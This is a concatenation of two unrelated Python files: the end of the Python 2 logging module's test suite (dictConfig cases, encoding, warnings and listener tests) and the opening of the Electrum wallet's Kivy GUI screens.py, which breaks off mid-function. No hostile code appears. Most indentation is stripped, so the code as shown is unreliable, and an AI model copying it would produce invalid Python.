def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
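    # Added note: dictConfig() resolves the cfg:// values in config11 against
    # the configuration dictionary itself, so 'formatters' points at the
    # 'true_formatters' section and handler 'hand1' at
    # 'handler_configs[hand1]' instead of containing inline definitions.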
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
            #Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest)
if __name__ == "__main__":
test_main()
|
screens.py
|
import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List, Optional
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from kivy.logger import Logger
from electrum.util import profiler, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING
from electrum import bitcoin, constants
from electrum.transaction import Transaction, tx_from_any, PartialTransaction, PartialTxOutput
from electrum.util import (parse_URI, InvalidBitcoinURI, PR_PAID, PR_UNKNOWN, PR_EXPIRED,
PR_INFLIGHT, TxMinedInfo, get_request_status, pr_expiration_values,
maybe_extract_bolt11_invoice)
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
from electrum import simple_config
from electrum.lnaddr import lndecode, parse_lightning_invoice
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
from electrum.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
        # FIXME: use a proper event instead of relying on the screen animation time
        Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with the corresponding list in the Qt
# GUI; it is indexed by the status value returned by wallet.get_tx_status()
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file('electrum/gui/kivy/uix/ui_screens/history.kv')
Builder.load_file('electrum/gui/kivy/uix/ui_screens/send.kv')
Builder.load_file('electrum/gui/kivy/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = "atlas://electrum/gui/kivy/theming/light/lightning"
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
payment_request_queued = None # type: Optional[str]
parsed_URI = None
def set_URI(self, text: str):
if not self.app.wallet:
self.payment_request_queued = text
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
if self.payment_request_queued:
self.set_URI(self.payment_request_queued)
self.payment_request_queued = None
_list = self.app.wallet.get_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list]
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item):
invoice_type = item['type']
status, status_str = get_request_status(item) # convert to str
if invoice_type == PR_TYPE_LN:
key = item['rhash']
log = self.app.wallet.lnworker.logs.get(key)
if item['status'] == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
elif invoice_type == PR_TYPE_ONCHAIN:
key = item['id']
else:
raise Exception('unknown invoice type')
return {
'is_lightning': invoice_type == PR_TYPE_LN,
'is_bip70': 'bip70' in item,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item['message'],
'amount': self.app.format_amount_and_units(item['amount'] or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Bitcoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
if self.is_lightning:
return parse_lightning_invoice(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self._do_pay_lightning(invoice)
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
do_pay = lambda rbf: self._do_pay_onchain(invoice, rbf)
if self.app.electrum_config.get('use_rbf'):
d = Question(_('Should this transaction be replaceable?'), do_pay)
d.open()
else:
do_pay(False)
else:
raise Exception('unknown invoice type')
def _do_pay_lightning(self, invoice):
attempts = 10
threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice['invoice'], invoice['amount'], attempts)).start()
def _do_pay_onchain(self, invoice, rbf):
# make unsigned transaction
outputs = invoice['outputs'] # type: List[PartialTxOutput]
amount = sum(map(lambda x: x.value, outputs))
coins = self.app.wallet.get_spendable_coins(None)
try:
tx = self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs)
except NotEnoughFunds:
self.app.show_error(_("Not enough funds"))
return
except Exception as e:
Logger.exception('')
self.app.show_error(repr(e))
return
if rbf:
tx.set_rbf(True)
fee = tx.get_fee()
msg = [
_("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
_("Mining fee") + ": " + self.app.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
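        # FEERATE_WARNING_HIGH_FEE is a feerate expressed per 1000 bytes of tx
        # size, so the check below compares the absolute fee against
        # warning_rate * estimated_size() / 1000.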
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
msg.append(_("Enter your PIN code to proceed"))
self.app.protected('\n'.join(msg), self.send_tx, (tx,))
def send_tx(self, tx, password):
if self.app.wallet.has_password() and password is None:
return
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
def clear_invoices_dialog(self):
invoices = self.app.wallet.get_invoices()
if not invoices:
return
def callback(c):
if c:
